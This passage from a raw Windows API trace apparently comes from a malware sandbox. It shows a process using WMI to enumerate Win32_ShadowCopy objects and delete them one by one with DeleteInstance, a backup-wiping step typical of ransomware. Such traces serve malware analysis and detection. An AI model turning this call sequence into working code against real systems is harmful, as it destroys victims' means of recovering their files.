wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0130.589] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x53 [0130.589] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0130.589] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0130.589] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0130.589] IUnknown:Release (This=0x142498) returned 0x1 [0130.590] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be520a0) returned 0x0 [0130.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be520a0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0130.590] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be520a0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52e90) returned 0x0 [0130.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52e90, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52e90) returned 0x0 [0130.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52e90, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0130.591] WbemDefPath:IUnknown:AddRef (This=0x1be52e90) returned 0x3 [0130.591] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0130.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52e90, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b936ce0) returned 0x0 [0130.591] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b936ce0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0130.591] WbemDefPath:IUnknown:Release (This=0x1b936ce0) returned 0x3 [0130.591] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0130.592] WbemDefPath:IUnknown:AddRef (This=0x1be52e90) returned 0x4 [0130.592] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52e90, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0130.592] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x3 [0130.592] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x2 [0130.592] WbemDefPath:IUnknown:Release (This=0x1be520a0) returned 0x0 [0130.592] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x1 [0130.593] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0130.593] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0130.593] WbemDefPath:IUnknown:AddRef (This=0x1be52e90) returned 0x2 [0130.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52e90, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52e90) returned 0x0 [0130.593] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x2 [0130.593] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x1 [0130.593] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0130.593] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0130.593] WbemDefPath:IUnknown:AddRef (This=0x1be52e90) returned 0x2 [0130.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52e90, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52e90) returned 0x0 [0130.594] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x2 [0130.594] WbemDefPath:IUnknown:AddRef (This=0x1be52e90) returned 0x3 [0130.594] WbemDefPath:IWbemPath:SetText (This=0x1be52e90, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x0 [0130.594] WbemDefPath:IUnknown:Release (This=0x1be52e90) returned 0x2 [0130.594] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0130.594] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0130.594] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.594] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0130.594] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0130.594] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.594] IWbemClassObject:Get (in: This=0x1be57010, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0130.595] SysStringLen (param_1="root\\cimv2") returned 0xa [0130.595] IWbemClassObject:Get (in: This=0x1be57010, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0130.595] SysStringLen (param_1="root\\cimv2") returned 0xa [0130.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0130.595] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0130.595] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.595] IWbemClassObject:Get (in: This=0x1be57010, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0130.595] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0130.595] IWbemClassObject:Get (in: This=0x1be57010, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0130.595] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0130.596] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52e90, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0130.596] WbemDefPath:IWbemPath:GetText (in: This=0x1be52e90, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0130.596] WbemDefPath:IWbemPath:GetText (in: This=0x1be52e90, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x0 [0130.596] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0130.596] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0130.596] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0130.596] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0130.597] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0130.597] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0130.597] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0130.597] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0130.597] IWbemClassObject:Get (in: This=0x1be57010, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0130.597] WbemDefPath:IWbemPath:GetText (in: This=0x1be52e90, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0130.597] WbemDefPath:IWbemPath:GetText (in: This=0x1be52e90, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"") returned 0x0 [0130.597] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{7199C78C-6563-4398-B813-4A3F86995AEC}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0132.179] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0132.179] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be576c0, puReturned=0x1c90de18*=0x1) returned 0x0 [0132.181] IUnknown:QueryInterface (in: This=0x1be576c0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be576c0) returned 0x0 [0132.181] IUnknown:QueryInterface (in: This=0x1be576c0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0132.181] IUnknown:QueryInterface (in: This=0x1be576c0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0132.181] IUnknown:AddRef (This=0x1be576c0) returned 0x3 [0132.181] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0132.181] IUnknown:QueryInterface (in: This=0x1be576c0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be576c8) returned 0x0 [0132.182] IMarshal:GetUnmarshalClass (in: This=0x1be576c8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0132.182] IUnknown:Release (This=0x1be576c8) returned 0x3 [0132.182] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0132.182] IUnknown:AddRef (This=0x1be576c0) returned 0x4 [0132.182] IUnknown:QueryInterface (in: This=0x1be576c0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0132.182] IUnknown:Release (This=0x1be576c0) returned 0x3 [0132.182] IUnknown:Release (This=0x1be576c0) returned 0x2 [0132.182] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0132.182] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0132.182] IUnknown:AddRef (This=0x1be576c0) returned 0x3 [0132.182] IUnknown:QueryInterface (in: This=0x1be576c0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be576c0) returned 0x0 [0132.183] IUnknown:Release (This=0x1be576c0) returned 0x3 [0132.183] IUnknown:Release (This=0x1be576c0) returned 0x2 [0132.183] IUnknown:Release (This=0x1be576c0) returned 0x1 [0132.183] CoTaskMemFree (pv=0x16a900) [0132.183] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0132.183] IUnknown:AddRef (This=0x1be576c0) returned 0x2 [0132.183] IWbemClassObject:Get (in: This=0x1be576c0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0132.183] IWbemClassObject:Get (in: This=0x1be576c0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0132.183] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x53 [0132.183] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0132.183] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0132.183] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0132.184] IUnknown:Release (This=0x142498) returned 0x1 [0132.184] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be52160) returned 0x0 [0132.184] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52160, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0132.185] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be52160, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52f50) returned 0x0 [0132.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52f50, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52f50) returned 0x0 [0132.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52f50, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0132.185] WbemDefPath:IUnknown:AddRef (This=0x1be52f50) returned 0x3 [0132.185] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0132.185] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52f50, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b936de0) returned 0x0 [0132.185] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b936de0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0132.185] WbemDefPath:IUnknown:Release (This=0x1b936de0) returned 0x3 [0132.186] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0132.186] WbemDefPath:IUnknown:AddRef (This=0x1be52f50) returned 0x4 [0132.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52f50, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0132.186] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x3 [0132.186] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x2 [0132.186] WbemDefPath:IUnknown:Release (This=0x1be52160) returned 0x0 [0132.186] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x1 [0132.186] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0132.186] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0132.186] WbemDefPath:IUnknown:AddRef (This=0x1be52f50) returned 0x2 [0132.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52f50, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52f50) returned 0x0 [0132.186] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x2 [0132.187] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x1 [0132.187] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0132.187] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0132.187] WbemDefPath:IUnknown:AddRef (This=0x1be52f50) returned 0x2 [0132.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52f50, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52f50) returned 0x0 [0132.187] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x2 [0132.187] WbemDefPath:IUnknown:AddRef (This=0x1be52f50) returned 0x3 [0132.187] WbemDefPath:IWbemPath:SetText (This=0x1be52f50, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0F63D180-8A8A-41CF-8B3E-2852647AB192}\"") returned 0x0 [0132.187] WbemDefPath:IUnknown:Release (This=0x1be52f50) returned 0x2 [0132.187] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0132.187] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0132.187] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, 